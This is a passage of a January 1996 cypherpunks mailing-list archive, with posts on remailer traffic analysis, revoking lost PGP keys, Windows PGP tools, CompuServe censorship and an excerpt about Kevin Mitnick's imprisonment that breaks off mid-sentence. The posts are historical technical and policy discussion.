Date: Sat, 6 Jan 1996 16:10:31 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Mixmaster On A $20 Floppy?
In-Reply-To: <199601060155.UAA13574@pipe3.nyc.pipeline.com>
Message-ID: <199601060756.CAA08977@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

tallpaul writes:
> Weight, under two pounds. Price ~$US250. Capacity 135 Mb formatted. Price
> of spare disks: $US 20. 
> Take it off a computer. Put it in a briefcase. Carry it with you nicely out
> of public view. Hook it up to another machine and .... 
[...]
> Question 2: Anybody want to speculate on what traffic analysis is like when
> encrypted data comes INTO one known Mixmaster site but goes OUT on one or
> more "unknown" or (partially) random Mixmaster sites? 

The "ultimate" traffic analysis problem, as others have observed, is
the correlation between messages sent by A and received by B via the overall
network. Hence the utility of a Dining Cryptographers' Net, PipeNet, etc. in 
which the apparent bandwidth variation between any two points is eliminated. 
A and B are effectively folded into the network.

I suppose that a site that escapes detection as a Mixmaster will throw off
the correlation stats (i.e. because a message from that site to B won't be
identified as a remailed message). But such sites are elusive objects I
think. On the one hand, the site can't endure for long, or else its 
throughput traffic will likely give it away as an anonymizer (i.e. it gets
lots of mail from the Mix network, and sends out similar amounts of mail to
all sorts of people and the network). On the other hand, it had better last,
or else it will look suspicious as a transient account receiving mail from
the Mix network, sending a few messages, and quickly vanishing.  

Futplex <futplex@pseudonym.com>
"Dammit Jim, I'm a doctor, not a bricklayer!"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMO4q/SnaAKQPVHDZAQHO/Qf+Jck8iHbDUw82+9vpuSL69u/Rz071/2fj
ni0ubl1pceBYDar+xYumo9FclIt9mr9P/D/as/5NxQ94vCLsomle88SvtOsGyZxE
+10uKlMevp3L3Q7FKYuXqjxb5Np1qrbLHxZvkeaA1llCGdaZMiohyIJGUKyJhqEw
M0br/9wLrux4IrTNR6Gj53MUdNwjQFwHnESfKtInZbKBKWYtPfL9LMCNttb8EUBg
vCcq3V1lEW3ykxnRMrFyc53+j3DfL0U1npuO5JgbyCrFjIIviWDTM+r8bV9VXiK7
ZBbrQbDCigSoeWT7kYYxI6iw28NtlVEnsz39qEafKWlNnQemswVyHQ==
=Uo6y
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mr. Nobody" <mixmaster@anon.alias.net>William Bennet <x@x.x>
Date: Fri, 5 Jan 1996 17:21:30 +0800
To: frantz@netcom.com.cypherpunks@toad.com
Subject: None
In-Reply-To: <199601050311.TAA27567@netcom5.netcom.com>
Message-ID: <199601060905.DAA21075@fuqua.fiftysix.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199601050311.TAA27567@netcom5.netcom.com> frantz@netcom.com (Bill Frantz) writes:

> From: frantz@netcom.com (Bill Frantz)
> Date: Thu, 4 Jan 1996 19:13:58 -0800
> 
> At 20:05 1/4/96 -0500, anonymous@freezone.remailer wrote:
> >Does anyone understand what this "Concryption" really is? Reading the
> >press blurbs, it could be nothing more than simply compressing the
> >stream before encrypting it. A patent on that idea would be rather
> >awkward.
> 
> What I interpreted their press release as saying was that they had patented
> the idea of doing the compression AND the encryption in one pass over the
> data.  If they got a patent for this, then the patent office has totally
> lost the concept that in order to be patentable, the idea must not be
> obvious to those well versed in the state of the art.

Unfortunately, the patent office has totally lost that concept, with
rather disastrous consequences for people who can't afford to fight
bogus patents in court.  http://www.lpf.org for more info.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael C. Peponis" <mianigand@unique.outlook.net>
Date: Sat, 6 Jan 1996 22:40:55 +0800
To: cypherpunks@toad.com
Subject: Re: Revoking Old Lost Keys
Message-ID: <199601060759.BAA03401@unique.outlook.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


On  5 Jan 96 , Bruce Baugh wrote:

> I'd like to bring up a problem I haven't seen addressed much yet, and which
> I think is going to come up with increasing frequency as PGP use spreads.
> 
> The problem is this: how can one spread the word that an old key is no
> longer to be used when one no longer has the pass phrase, and cannot
> therefore create a revocation certificate?

It's an administrative nightmare.  I assume that you mean if the key 
is widley distributed.  If it's only circulating among a small group 
of people that know each other, no problem.  

If it's widley distributed, or on a keyserver, that becomes hard.  
First you would have to be authenticated as the origional key owner, 
ie how do I realy know that you are you, and not somebody saying you 
are the orgional key owner?

Another problem, let's say I get your public key from Bob, who signed 
your key, and Bob knows you have revoked your key, but I don't, so 
what happens to my copy of your key? 

Since there is no revokation certificate, I am forced to take Bob's 
word that you have indeed want to revoke your key, but have no way of 
verifying that without talking to you, and agin I have to go through 
the same verification process that Bob did.

Good topic. 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMO2+BkUffSIjnthhAQFPuQP7BOBJTkqInT4nIAQ7ity4/AutSn9QusFx
FdG6iPQVG11fp2BbGtDeQMSgaFUDxXm99Oim/VINGWDmbMWhcWTAXDPpYrd2+bjH
Q9/SNs+5akQc+bbojqIjDoXas/5LL4VvbrEeSOvklpKg+GrCleJYqN+Mh2aY35ZL
04GLVJJLzSo=
=Xr5x
-----END PGP SIGNATURE-----
Regards,
Michael Peponis
PGP Key Avalible form MIT Key Server
Key fingerprint =  DD 39 66 3D AE DE 71 C2  B6 DA B2 3F 47 2A EB AC 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@eng.usf.edu>
Date: Sat, 6 Jan 1996 17:23:36 +0800
To: Bruce Baugh <bruceab@teleport.com>
Subject: Re: Revoking Old Lost Keys
In-Reply-To: <2.2.32.19960106070719.00694cc8@mail.teleport.com>
Message-ID: <Pine.SUN.3.91.960106040838.19469A-100000@sunflash.eng.usf.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Fri, 5 Jan 1996, Bruce Baugh wrote:

> The problem is this: how can one spread the word that an old key is no
> longer to be used when one no longer has the pass phrase, and cannot
> therefore create a revocation certificate?

  If there is someone that you trust (or several people), just make a 
revocation certificate and possibly cut it into pieces, and just let 
those know when to send it out, so that you don't have to rely on a 
faulty memory, and by having it in several hands they can't just send it 
out, as they don't know the other people.  Just a thought.

==========================================================================
James Black (Comp Sci/Comp Eng sophomore)
e-mail: black@eng.usf.edu
http://www.eng.usf.edu/~black/index.html
"An idea that is not dangerous is unworthy of being called an idea at all."
Oscar Wilde 
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Don M. Kitchen" <don@wero.cs.byu.edu>
Date: Sat, 6 Jan 1996 23:35:54 +0800
To: cypherpunks@toad.com
Subject: Forgetting passphrase/escrow/pgp 3
Message-ID: <199601061403.HAA00239@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


As has been mentioned, this is a good situation for the use of some
kind of escrow. Not meaning to talk about crypto or anything, but it
seems to me that there's already some good shamir sharing code out there,
I hope the overworked, underpaid PGP 3.0 people put shamir sharing
capabilities. I see it as a slight modification of the split/merge
code, which PGP already has, plus already written shamir code that
hopefully need only be cut-and-pasted into PGP.

This is what non-GAK escrow people want, right? Easy-to-use strong-crypto
escrow?

Don
-- 
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Sun, 7 Jan 1996 02:55:35 +0800
To: rsalz@osf.org (Rich Salz)
Subject: Re: http://www.rsa.com/rsalabs/cryptobytes/
In-Reply-To: <9601051755.AA04835@sulphur.osf.org>
Message-ID: <199601061616.IAA10646@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    >lynx http://www.rsa.com/rsalabs/cryptobytes/

    CryptoBytes (p2 of 4)

       Back issues available in electronic form:

              Volume 1 Number 1 - Spring 1995
    ...     

    Alas thats all there is.  No later volumes yet.  Preserving
    the value of the $90 annual subscription I guess.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sat, 6 Jan 1996 22:51:48 +0800
To: cypherpunks@toad.com
Subject: Re: Windows Eudora and PGP
Message-ID: <2.2.32.19960106023946.0068c404@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:32 AM 01/6/96 -0800, Alan Olsen <alano@teleport.com> wrote:
>At 03:04 PM 1/5/96 +0800, Ng Pheng Siong wrote:
>>On Fri, 5 Jan 1996, David K. Merriman wrote:
>>> I've gotten ahold of the WPGP mentioned here a couple days ago, and it seems
>>> to be working just fine, for me. Even easier to use than PIdaho, though not
>>> quite as 'full-featured' (ie, remailer support, etc).
>>
>>Aegis, which was mentioned on this list some months ago, is the best
>>of the lot, IMHO. No remailer support: You can talk to a remailer from 
>>an email program. ;)
>
>I use Aegis right now and I have only one major problem with it.  It does
>not have a facility to do word wraps in the program before signing.  This
>means that if you use it with Eudora and word wrap is on, all of your sigs
>are going to be bad.  (And hitting return on every line before feeding it
>through is a pain in the ass.)
>
>On the other hand, I have heard that WPGP is not very stable under Win95.
>Can't win for losing...
>

I'm running WPGP under Win95, and so far it's been as stable as Win95. On my
machines, that's been pretty darn stable - YMMV :-)
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMO3EV8VrTvyYOzAZAQGrLwP+M2Sol133Vg329ImG39utW+kxhjcg9Ctc
nEPZl9hqPXGG/tPbRG7UMbNi8TBW8/Qqw4oWV6hNb/aOLlYuQ5hrxOogFCSzUn4w
0smLGwrc1siWa1YEWiBgbgrzY7nP0thCgM7jiVbkbaNLAn01+Rj8ZzuSxWP/1sxW
l6E7+pZ7Rx8=
=5lv3
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 6 Jan 1996 22:04:23 +0800
To: cypherpunks@toad.com
Subject: CelBomb
Message-ID: <199601061349.IAA11236@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Can anyone in IL, or elsewhere, report more on the head-job
   of The Engineer:

   Any crypto used to authenticate the target for the boombox,
   or to obscure links to the assassin?

   How was the blast specifically targeted at him and not a
   phone borrower?

   How it was set off -- by user-dialing, remote control, some
   other means?

   Any fishy smelling brand names to immediately run from?

   Answers urgent.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Sun, 7 Jan 1996 07:00:50 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Revoking Old Lost Keys
Message-ID: <01BADC1C.309CFE20@dialup-080.dublin.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain


On Saturday, January 06, 1996 09:18, Timothy C. May[SMTP:tcmay@got.net] wrote:
>At 7:07 AM 1/6/96, Bruce Baugh wrote:
>>I'd like to bring up a problem I haven't seen addressed much yet, and which
>>I think is going to come up with increasing frequency as PGP use spreads.
>>
>>The problem is this: how can one spread the word that an old key is no
>>longer to be used when one no longer has the pass phrase, and cannot
>>therefore create a revocation certificate?
>
>Basically, you are screwed. Any revocation you attempt will not be trusted,
>as we will suspect the new "you" to be an attacker, perhaps an agent of the
>NSA or the Illuminati. In the view that "you are your key," the old you no
>longer exists.

This is true, but the "old you" can be resurrected if you can get enough 
people to believe your new key using any out-of-band means available
to you.  You can also put a comment in your new key's uid explaining the
problem and how to verify the new key. You will find it very hard to use this 
new key for a while, though, during the transition period. Many people will take 
the existence of two keys with the same uid as suspicious in itself, since it at 
least indicates some kind of attack (even if only a denial of service attack).  
This is really a usability flaw with current PGP.

The PGP formats do allow for a 'revocation' certificate, but PGP doesn't
implement it (yet, I guess).  In any case, it's not really strong enough, 
since what it says is "I retract all my previous statements that this key is 
related to this user".  This'd mean that you'd have to visit everyone who'd ever 
signed your key and get them to issue this retraction. What would be needed 
for this problem is either an "anti-certificate" ("This key does not belong to this 
user"), or else some convention. For example, if two _trusted_ keys are found for the 
same uid, the most recent one could be chosen, and the earlier one be purged 
from keyservers, etc.  This may be possible with current PGP.  I haven't tried it, 
but since I have some keys which have fallen into disuse, I will need to do so 
sometime.).

Cheers,
Frank O'Dwyer
fod@brd.ie                          http://www.iol.ie/~fod





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve14571@aol.com
Date: Sun, 7 Jan 1996 01:34:57 +0800
To: goerzenj@complete.org
Subject: Fwd: Undeliverable: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <960106095457_108133691@mail04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Something else I want to know...  Why is my mail going through microsoft.com?
---------------------
Forwarded message:
From:	postmaster@microsoft.com (Postmaster)
To:	Steve14571@aol.com (Steve14571@aol.com)
Date: 96-01-05 19:32:00 EST

Your message did not reach some or all of the intended recipients.

      To:	goerzenj@complete.org
      Cc:	cypherpunks@toad.com
      Subject:	Re: Massey, CEO of Compuserve, on Internet
      Sent:	01/04/96 18:43:35

The following recipient(s) could not be reached:

      David Tagliani on 01/04/96 18:43:35
            The recipient name is not recognized
            [MSEXCH:MSExchangeMTA:northamerica:RED-70-MSG]

      Eric S. Hanson (NT RPC) on 01/04/96 18:43:35
            The recipient name is not recognized
            [MSEXCH:MSExchangeMTA:northamerica:RED-70-MSG]


Original Message Follows
========================


From: "Steve14571@aol.com" <Steve14571@aol.com>
To: "goerzenj@complete.org" <goerzenj@complete.org>
Cc: "cypherpunks@toad.com" <cypherpunks@toad.com>
Subject: Re: Massey, CEO of Compuserve, on Internet
Date: Thu, 4 Jan 1996 18:43:35 -0800

In a message dated 96-01-03 00:34:25 EST, you write:

>CompuServe is not location-dependant.  The network operates exactly the 
>same regardless of calling location (indeed, the system doesn't even know 
>where you're calling from I believe).  It is a worldwide CompuServe 
>Network that people use to access it.  This network just allows dialups 
>and then gets the users connected to the CompuServe computers.  The main 
>computers handle all traffic.  They don't are location-independant, 
>making it impossible to block access based on location.

I see two possible ways to censor German users only (but I still believe
censoring anyone is wrong).  First, the "main computers" could be told where
they are, and "censored" material could be filtered at that level before it
is sent to individual users.  Or CompuServe could release a software update
for German users.  The software would not recognize banned newsgroups.  How
difficult could that possibly be?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@tipper.oit.unc.edu>
Date: Sun, 7 Jan 1996 02:15:06 +0800
To: cypherpunks@toad.com
Subject: Mitnik: latest?
Message-ID: <199601061547.KAA13440@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain



I was curious where Kevin is now and what he is doing or waiting for?
Anyone got a timeline of whats in store for him?

Cheers,
Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 7 Jan 1996 02:04:54 +0800
To: cypherpunks@toad.com
Subject: Internet & Porno on A&E tonite
Message-ID: <199601061654.KAA05672@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Just saw an add for a Investigative Reports show tonite on A&E dealing with
the Internet and some of the current issues relating to porno and privacy.


                                              Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 7 Jan 1996 02:00:22 +0800
To: cypherpunks@toad.com
Subject: Re: Revoking Old Lost Keys
Message-ID: <ad13f5e103021004cdef@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:10 AM 1/6/96, James Black wrote:
>Hello,
>
>On Fri, 5 Jan 1996, Bruce Baugh wrote:
>
>> The problem is this: how can one spread the word that an old key is no
>> longer to be used when one no longer has the pass phrase, and cannot
>> therefore create a revocation certificate?
>
>  If there is someone that you trust (or several people), just make a
>revocation certificate and possibly cut it into pieces, and just let
>those know when to send it out, so that you don't have to rely on a
>faulty memory, and by having it in several hands they can't just send it
>out, as they don't know the other people.  Just a thought.

If one can safely and securely store a revocation certificate for later
use, why not just store the much shorter passphrase?

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 7 Jan 1996 02:21:15 +0800
To: cypherpunks@toad.com
Subject: RE: Revoking Old Lost Keys
Message-ID: <ad13f6bf040210040236@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:47 AM 1/6/96, Frank O'Dwyer wrote:
>On Saturday, January 06, 1996 09:18, Timothy C. May[SMTP:tcmay@got.net] wrote:

>>Basically, you are screwed. Any revocation you attempt will not be trusted,
>>as we will suspect the new "you" to be an attacker, perhaps an agent of the
>>NSA or the Illuminati. In the view that "you are your key," the old you no
>>longer exists.
>
>This is true, but the "old you" can be resurrected if you can get enough
>people to believe your new key using any out-of-band means available
>to you.  You can also put a comment in your new key's uid explaining the

Could you explain how "enough people" can get around a basic
feature/limitation of the current PGP web of trust? Who, besides the
originator, can revoke an old key? How many does it take?

If a bunch of the "alleged" friends of Bruce could do this, could they not
revoke the key of someone they simply wish to hassle?

I agree that a new key can be generated, and a new "Please use this key,
not the other one" message sent, and this may work, but I don't believe
this revokes the old key and removes it from the keyservers. I could be
wrong, as I am certainly no expert on the keyservers.

The question is: is there a "majority vote" mode on the keyservers that
causes them to remove a key if enough people claim it is no longer valid?

--Tim May




We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sun, 7 Jan 1996 03:31:08 +0800
To: "'Steve14571@aol.com>
Subject: FW: Undeliverable: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <01BADC29.B54CF780@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From:   Steve14571@aol.com

Something else I want to know...  Why is my mail going through microsoft.com?
.......................................................................................................

There is an email 'alias' at Microsoft which was subscribed to the cpunk list, to receive and distribute the cpunk list to members of that alias.

A new beta version of Exchange is being used on a test basis by some departments (apparently all of the cpunks at MS are using it), and the programmers recently encountered a "little complication" (to use a phrase from the movie 'Brazil').   I'm told that the problems were corrected, but that now the spoolers are releasing messages which were backed up while mail delivery was put on hold.   I hate to agree with Timothy C. May, but it is probably best to "use technology " to deal with it for a day or so.

   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 7 Jan 1996 00:34:31 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Revoking Old Lost Keys
In-Reply-To: <ad1366a50002100426f2@[205.199.118.202]>
Message-ID: <199601061626.LAA06345@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy May wrote:
> At 7:07 AM 1/6/96, Bruce Baugh wrote:
> 
> >I'd like to bring up a problem I haven't seen addressed much yet, and which
> >I think is going to come up with increasing frequency as PGP use spreads.
> >
> >The problem is this: how can one spread the word that an old key is no
> >longer to be used when one no longer has the pass phrase, and cannot
> >therefore create a revocation certificate?
> 
> Basically, you are screwed. Any revocation you attempt will not be trusted,
> as we will suspect the new "you" to be an attacker, perhaps an agent of the
> NSA or the Illuminati. In the view that "you are your key," the old you no
> longer exists.
> 
...
> 
> Seriously, this is an example where "escrow" works. Seal an envelope with
> your passphrase and any other stuff you want to remember, and leave it with
> your lawyer or escrow agency with instructions to only turn it over to you.
> Same as a safe deposit box, unless you forget the key. (You could forget
> you have a lawyer, so better write that down somewhere, too.)

Escrow is orthogonal to the underlying problem here, which is that the
PGP revocation model is completely wrong.  Since the trust properties
and other semantics of a key originate with the certificates attached to
the key, and not from the key owner per se, it makes little sense to make
the key owner responsible for revoking that trust.  Far more sensible would
be a scheme in which the certificate issuers themselves could revoke their
certificates when they believe a key is no longer trustworthy.  (A practical
decentralized system like PGP could provide a facility for certifiers to
"pre-revoke" their certificates at the time they are issued so that the key
owner could distribute the revocation certificates himself if he discovers
his own key to have been compromised or lost.)

Note that the problem here is in the basic trust model, not just the
certificate distribution model (which is a separate problem).  The lack of
ability for a certifier to revoke his own certification, plus the lack of a
facility to put limits on the duration and meaning of the certification,
make PGP certificates of very limited practical value.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 7 Jan 1996 02:12:10 +0800
To: mab@crypto.com (Matt Blaze)
Subject: Re: Revoking Old Lost Keys
In-Reply-To: <199601061626.LAA06345@crypto.com>
Message-ID: <199601061748.LAA06159@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Note that the problem here is in the basic trust model, not just the
> certificate distribution model (which is a separate problem).  The lack of
> ability for a certifier to revoke his own certification, plus the lack of a
> facility to put limits on the duration and meaning of the certification,
> make PGP certificates of very limited practical value.

Isn't the last bit here, the part about duration and meaning, the 
practical answer to the problem?  Especially duration?

The stuff that's been going on lately with Netscape's browsers, Sameer's
apache ssl server, and the difficulty of getting CAs like verisign to
approve keys underscores the importance of this issue.

This is probably sort of half-baked, but is it possible to come up with a 
formal grammar that would allow us to describe trust models in general?  
What if we had a prolog-like system that allowed you to set up rules like:

"x is a student if x has got a signature from a school" 
"x is a school if x has got a signature from the accredation authority"
"x belongs to the secret society of x has signatures from 3 other people
who have belonged to the society for more than a year, and if x is 
a certified owner of a duck."

Wouldn't something like this give us the flexibility to use a PGPish model
of trust or an X.509ish model, or whatever else we wanted to do?

It seems to me that the rules that govern when you can accept which 
signature ought to be data objects in a more flexible system, just as the 
signatures themselves are data objects.  That means that the rules 
themselves ought to be subject to change, revokation, or revision.  

The constitution wouldn't have survived if it didn't contain a mechanism 
for ammendment.  Wouldn't a model of trust with the same ability for 
revision and extension be a lot more robust, and a lot more resistent to 
centralized control?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 7 Jan 1996 04:25:39 +0800
To: post@why.net (post)
Subject: Re: Why can't I get PGP from MIT
Message-ID: <2.2.32.19960106200842.0095e840@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:47 PM 1/6/96 -0600, post wrote:
>MIT won't let me get PGP or PGPhone.  I know their server
>went down awhile back but, I have tried them several times
>and sent several e-mail requests.  I thought maybe I was
>missing something obvious or maybe they are just really
>busy.  I keep being told I'm not in the U.S.

There was a posting (either on the server or somewhere else) that claimed
that the MIT site was having problems with .net and .org sites.  (As well as
a couple of others if I remember correctly.)  The posting claimed that they
had fixed the problem, but i guess not...

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 7 Jan 1996 01:31:08 +0800
To: cypherpunks@toad.com
Subject: Mitnik: latest? -- Long, watch it
Message-ID: <199601061716.MAA01565@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Perhaps Brian Davis will comment with the latest but here's
   Littman on Mitnick (and scans of Shimomura/Media/Feds)
   through October, 1995:


   As Tsutomu Shimomura launched his new careers as pitchman,
   author, movie subject, and video game designer, Kevin
   Mitnick sat in a Southern county jail. Mitnick wrote to me
   nearly every week on yellow legal paper in longhand,
   bemoaning the lack of a word processor as he recounted the
   hardships of jail. He told me he had been attacked and
   robbed by two inmates and barely avoided fights with
   several others. When he complained that the vegetarian diet
   he requested was limited to peanut butter sandwiches, and
   that his stress and stomach medication prescriptions
   weren't filled, he was moved to a tougher county jail.

   His grammar wasn't perfect, but his writing was
   surprisingly frank and descriptive. Mitnick punctuated his
   letters with Internet shorthand, noting the precise minute
   he began each letter, as if he were still online. He was
   bitter, but he hadn't lost his sense of humor. When his
   jailers admitted they'd read the letter Mike Wallace wrote
   him, inviting him to appear on 60 Minutes, Mitnick admitted
   the irony of him, of all people, complaining about other
   people reading his mail. "Poetic justice, eh? ..."

   Once in a while he'd slip in a tantalizing comment about
   his case. One week he'd appear to trust me, the next he'd
   wonder whether I would betray him. It was strange
   corresponding with the man the media and our government had
   cast as a twenty-first-century Frankenstein. Mitnick
   himself didn't seem sure of who or what he was. He asked
   whether I felt he should be given a long prison sentence.
   Did I think he was evil? Dangerous?

   When he was sent to his second jail, as a matter of policy
   the U.S. Marshals confiscated his books, his underwear, his
   toiletries. Mitnick was doing the worst prison "time"
   possible, because the Eastern District of North Carolina
   had no federal detention center. That meant he would have
   to defend himself without access to a law library, required
   by law in federal institutions. The nurse in Mitnick's
   second county jail cut his medication again, and on June
   18, his attorney filed a motion in federal court stating
   that Mitnick "was taken to the hospital and diagnosed with
   esophageal spasms." The attorney argued that the
   "deliberate indifference" to Mitnick's "serious medical
   needs" violated constitutional standards.

   Before a federal judge could order a hearing on the medical
   issues, Mitnick was transferred to his third North Carolina
   jail in as many months. "He [Mitnick] overextended his
   welcome," explained a deputy U.S. Marshal in Raleigh who
   preferred to remain anonymous. "It was time for a change of
   scenery. This happens with a lot of them. They get where
   they think they're running the place."

   Mitnick's third county jail was his worst yet. He shared a
   cell with seven other men. There was no law library, radio
   or television, and each inmate was allowed only two books
   at a time. Mitnick's were the Federal Criminal Code and the
   Federal Sentencing Guidelines. The eight men in Mitnick's
   cell were forced to share a single pencil stub that was
   taken away in the afternoon. Mitnick was allotted one sheet
   of paper a day.

   On April 10, 1995, John Dusenberry, Mitnick's public
   defender, filed a motion to suppress evidence and dismiss
   the indictment. He argued that the blank search warrants
   and the warrantless search of Mitnick's apartment violated
   the Fourth Amendment, which specifically prohibits
   unreasonable search and seizure.

   In the government's response, John Bowler, the Assistant
   U.S. Attorney in Raleigh, defended the blank search
   warrants, not an easy proposition in a free country. Bowler
   prefaced his argument by claiming, despite evidence to the
   contrary, that Shimomura tracked Mitnick on his own until
   February I4, just hours before his capture. The
   government's response to the issue of the blank search
   warrants was to blame Magistrate Wallace Dixon. Bowler
   asserted that the FBI had wanted to execute the search
   properly, but the magistrate had "upon his own initiative"
   insisted on signing the blank search warrants.

   But a judge never ruled on these arguments. The
   twenty-three-count indictment the Associated Press had
   hypothesized could land Mitnick 460 years in jail fell
   apart. The government abandoned its case in Raleigh,
   dismissing all but one of the counts in accepting a plea
   bargain from Mitnick that would likely get him time served,
   or at most eight months. The tiny story was buried in the
   back pages of the New York Times.

   "Kevin is going to come and face the music in L.A., where,
   of course, the significant case has always been," David
   Schindler, the U.S. Attorney in Los Angeles, told the L.A.
   Times. The newspaper said the prosecutor believed Mitnick
   would receive stiffer punishment "than any hacker has yet
   received," a sentence greater than Poulsen's four years and
   three months.

   Mitnick's letters revealed how Schindler planned to win the
   record prison term. Schindler was claiming losses in excess
   of $80 million, the amount that would garner the longest
   possible sentence for a fraud case according to the Federal
   Sentencing Guidelines. Nor would Schindler have to
   substantiate his claim. The government only had to
   "estimate" the loss. Mitnick's attorneys said the figure
   was grossly exaggerated, and added that the case rested on
   source code allegedly copied from cellular companies. There
   was no proof that Mitnick had tried to sell the code, and
   there was no evidence it could be sold for an amount
   approaching $80 million. But under the guidelines the
   absence of a profit motive was no obstacle to a long jail
   term. David Schindler was seeking an eight-to-ten-year
   sentence for Kevin Mitnick, about the same prison time
   doled out for manslaughter.

   The jailed hacker wasn't the only one whose feats were
   being hyped. By August of 1995, the advertisement in
   Publishers Weekly for Shimomura's upcoming book featured
   Mitnick's New York Times photo stamped with the caption HE
   COULD HAVE CRIPPLED THE WORLD. Declared the ad, "Only One
   Man Could Stop Him: SHIMOMURA."

   The hyperbole made me flash on what Todd Young had done in
   Seattle. The bounty hunter had tracked Kevin Mitnick down
   in a few hours with his Cellscope. Unauthorized to arrest
   him, he'd kept Mitnick under surveillance for over two
   weeks as he sought assistance. But the Secret Service
   didn't think the crimes were significant. The U.S.
   Attorney's Office wouldn't prosecute the case. Even the
   local cops didn't really care.

   When I met Young in San Francisco a couple of weeks after
   Mitnick's arrest, he was puzzled by the aura surrounding
   Shimomura and his "brilliant" capture of Kevin Mitnick. We
   both knew from independent sources that Shimomura had never
   before used a Cellscope. Young asked why the FBI would
   bring an amateur with no cellular tracking skills to
   Raleigh for the bust. If Shimomura's skill was measured by
   his ability to catch the hacker, then he was on a par with
   Todd Young, a thousand-dollar-a-day bounty hunter who never
   had the help of the FBI. The simple, unglamorous truth was
